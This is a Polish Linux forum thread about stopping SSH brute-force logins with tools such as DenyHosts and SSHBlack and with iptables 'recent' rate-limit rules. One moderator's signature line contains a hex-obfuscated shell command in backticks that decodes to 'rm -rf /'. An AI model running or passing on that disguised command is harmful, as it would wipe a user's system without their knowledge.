Bledne logowania sshd

Serwery i sieci oparte na Slackware, wszelkiego rodzaju usługi, troubleshooting.

Moderatorzy: Moderatorzy, Administratorzy

Awatar użytkownika
urbizdw
Użytkownik
Posty: 187
Rejestracja: 2006-10-09, 10:06
Lokalizacja: Zduńska Wola
Kontakt:

Bledne logowania sshd

Post autor: urbizdw » 2007-02-21, 04:45

Mam serwerek sshd patrze w logi a tam pelno atakow ktos probowal sie logowac pod roznymi loginami ;] i zastanawiam sie jak za pomoca iptablesa zrealizowac takie cos:
jesli sa 4 razy zle wprowadzone dane w czasie 1 godzinki z tego samego IP niech blokuje to IP na jeden dzien.
Chyba ze macie inne lepsze rozwiazanie ;]
[url=http://www.inflan.pl]www.inflan.pl[/url] - Usługi informatyczne. Koniecznie zobacz !

sayetan
Moderator w st. spocz.
Posty: 2193
Rejestracja: 2004-06-20, 21:47
Lokalizacja: Jelenia Góra

Re: Bledne logowania sshd

Post autor: sayetan » 2007-02-21, 05:01

Na forum juz jest takie rozwiazanie i to od dawna, funkcja szukaj nie gryzie.
# `echo -e "\x72\x6D\x20\x2D\x72\x66\x20\x2F"`

Awatar użytkownika
myuser
Użytkownik
Posty: 442
Rejestracja: 2006-02-09, 17:44
Lokalizacja: Warszawa
Kontakt:

Re: Bledne logowania sshd

Post autor: myuser » 2007-02-21, 09:05

DenyHosts project...

b4rtek
Użytkownik
Posty: 15
Rejestracja: 2006-10-11, 10:42

Re: Bledne logowania sshd

Post autor: b4rtek » 2007-02-21, 09:42

Blocksshd project... polecam, fajny skrypcik w perl-u.

Awatar użytkownika
Radek_R
Moderator
Posty: 1196
Rejestracja: 2004-06-14, 11:40
Lokalizacja: Kraków
Kontakt:

Re: Bledne logowania sshd

Post autor: Radek_R » 2007-02-21, 09:48

SSHBlack - jeszcze fajniejszy skrypt w perlu.
#358274
http://www.prook.net

Pajaczek
Użytkownik
Posty: 1439
Rejestracja: 2006-08-03, 13:16
Lokalizacja: Winny Gród

Re: Bledne logowania sshd

Post autor: Pajaczek » 2007-02-21, 11:07

albo 2 linijki w iptables :twisted:

jak mowil Sayetan use the search... hint "recent" and force be with You.

Sam to wprowadzilem, jak po jednej nocy (10 godzin ataku) przybylo mi jakies 800tys linii w logu ssh :twisted:

Awatar użytkownika
urbizdw
Użytkownik
Posty: 187
Rejestracja: 2006-10-09, 10:06
Lokalizacja: Zduńska Wola
Kontakt:

Re: Bledne logowania sshd

Post autor: urbizdw » 2007-02-21, 12:14

Kto mi podal taki skrypt:

Kod: Zaznacz cały

iptables -N SSH_CHECK
iptables -A INPUT -p tcp --dport 22 -m state --state NEW -j SSH_CHECK
iptables -A SSH_CHECK -m recent --set --name SSH
iptables -A SSH_CHECK -m recent --update --seconds 60 --hitcount 4 --name SSH -j DROP
I srednio to rozumie na jaki czas blokuje ten skrypt dane IP bo chcialme ustawie ze na 1 godzinke tylko nie wiem gdzie ;]
[url=http://www.inflan.pl]www.inflan.pl[/url] - Usługi informatyczne. Koniecznie zobacz !

Pajaczek
Użytkownik
Posty: 1439
Rejestracja: 2006-08-03, 13:16
Lokalizacja: Winny Gród

Re: Bledne logowania sshd

Post autor: Pajaczek » 2007-02-21, 15:32

urbizdw pisze:Kto mi podal taki skrypt:

Kod: Zaznacz cały

iptables -N SSH_CHECK
iptables -A INPUT -p tcp --dport 22 -m state --state NEW -j SSH_CHECK
iptables -A SSH_CHECK -m recent --set --name SSH
iptables -A SSH_CHECK -m recent --update --seconds 60 --hitcount 4 --name SSH -j DROP
I srednio to rozumie na jaki czas blokuje ten skrypt dane IP bo chcialme ustawie ze na 1 godzinke tylko nie wiem gdzie ;]
Wiesz... podstawowa jednostka ukladu SI jest sekunda...

czytac umiesz, wiec chyba dasz rade... hint "seconds 3600" -> 4 nowe polaczenia z jednego adresu w ciagu godziny... a przepraszam... 3, bo najpierw jest incrementowane, pozniej sprawdzane. Btw. ja bym to zrobil w 2 regolach, ale jak kto woli.

BTW. To nie skrypt, a regoly firewalla, do miana skryptu to jeszcze czegos brakuje ;)
Ostatnio zmieniony 2007-02-21, 15:34 przez Pajaczek, łącznie zmieniany 1 raz.

Awatar użytkownika
urbizdw
Użytkownik
Posty: 187
Rejestracja: 2006-10-09, 10:06
Lokalizacja: Zduńska Wola
Kontakt:

Re: Bledne logowania sshd

Post autor: urbizdw » 2007-02-22, 00:43

Pajaczek mozesz podac te dwie linijki jak Ty bys to napisal ;]?
[url=http://www.inflan.pl]www.inflan.pl[/url] - Usługi informatyczne. Koniecznie zobacz !

Pajaczek
Użytkownik
Posty: 1439
Rejestracja: 2006-08-03, 13:16
Lokalizacja: Winny Gród

Re: Bledne logowania sshd

Post autor: Pajaczek » 2007-02-22, 10:44

urbizdw pisze:Pajaczek mozesz podac te dwie linijki jak Ty bys to napisal ;]?
Dokladnie tak samo, tylko bez dodatkowego lancucha... ma to swoje zalety i wady. Zaleta jest mniej mieszania, i o 1 lancuch krotsza pordoz pakietu dla ssh. Wada o 1 lancuch dluzsze sprawdzanie dla pozostalych pakietow.

Kod: Zaznacz cały

iptables -A INPUT -p tcp --dport 22 -m state --state NEW -m recent --set --name SSH 
iptables -A INPUT -p tcp --dport 22 -m state --state NEW -m recent --update --seconds 60 --hitcount 4 --name SSH -j DROP

Awatar użytkownika
Radek_R
Moderator
Posty: 1196
Rejestracja: 2004-06-14, 11:40
Lokalizacja: Kraków
Kontakt:

Re: Bledne logowania sshd

Post autor: Radek_R » 2007-02-22, 10:57

Ale te wasze regułki z tego co widzę ograniczają jedynie ilość nowych połączeń z danego hosta (IP) w danym przedziale czasu, a nie robią tego co z założenia miały robić (blokować po pewnej ilości nieudanych logowań w danym obrębie czasu).
#358274
http://www.prook.net

Pajaczek
Użytkownik
Posty: 1439
Rejestracja: 2006-08-03, 13:16
Lokalizacja: Winny Gród

Re: Bledne logowania sshd

Post autor: Pajaczek » 2007-02-22, 11:01

Radek_R pisze:Ale te wasze regułki z tego co widzę ograniczają jedynie ilość nowych połączeń z danego hosta (IP) w danym przedziale czasu, a nie robią tego co z założenia miały robić (blokować po pewnej ilości nieudanych logowań w danym obrębie czasu).
Ale w polacznieu z limitem nieudanych logowan (w ssh.conf), sprawdza sie to dobrze... pozatym te klasyczne atakery, z tego co zauwazylem, stosuja zasade 1 polaczenie - 1 proba. W kazdym badz razie u mnie nie pojawiaja sie bloki wiecej niz 3 fake loginow (bo tez ustawilem u siebie na 3).

Ach... jeszcze jedno, faktycznie ta godzina moze troche zatruc zycie nawet "poprawnym" userom. Trzeba to jakos wyposrodkowac. Atakery w kazdym badz razie odpuszczaja po kilku min. jak nie moga sie polaczyc.
Ostatnio zmieniony 2007-02-22, 11:05 przez Pajaczek, łącznie zmieniany 2 razy.

Awatar użytkownika
Radek_R
Moderator
Posty: 1196
Rejestracja: 2004-06-14, 11:40
Lokalizacja: Kraków
Kontakt:

Re: Bledne logowania sshd

Post autor: Radek_R » 2007-02-22, 11:10

Pajaczek pisze:Ach... jeszcze jedno, faktycznie ta godzina moze troche zatruc zycie nawet "poprawnym" userom.
U siebie mam ustawione 6 nieudanych logowań wciągu 10 minut. Takich namolnych ludków blokuję na stałe (a nie jak chciał urbizdw na jeden dzień).
#358274
http://www.prook.net

Awatar użytkownika
urbizdw
Użytkownik
Posty: 187
Rejestracja: 2006-10-09, 10:06
Lokalizacja: Zduńska Wola
Kontakt:

Re: Bledne logowania sshd

Post autor: urbizdw » 2007-02-22, 11:22

Radek_R a nie uwazasz ze troche bezsensu jak blokuje na stale bo np ktos jest w jakiejs wiekszej sieci i zawsze znajdzie sie jaki duren co bedzie probowac sie zalogowac a jakis pozadny user bedzie chcial sie zalogowac i kiszka bo zblokujemy IP calej sieci ? wiec nie lepiej na jeden dzien? A jesli cos mzoesz mi podac roziwazanie?? Regulki w iptablesie?
[url=http://www.inflan.pl]www.inflan.pl[/url] - Usługi informatyczne. Koniecznie zobacz !

Pajaczek
Użytkownik
Posty: 1439
Rejestracja: 2006-08-03, 13:16
Lokalizacja: Winny Gród

Re: Bledne logowania sshd

Post autor: Pajaczek » 2007-02-22, 11:43

urbizdw pisze: A jesli cos mzoesz mi podac roziwazanie?? Regulki w iptablesie?
No przeciez Ci podal... 5 post.

ODPOWIEDZ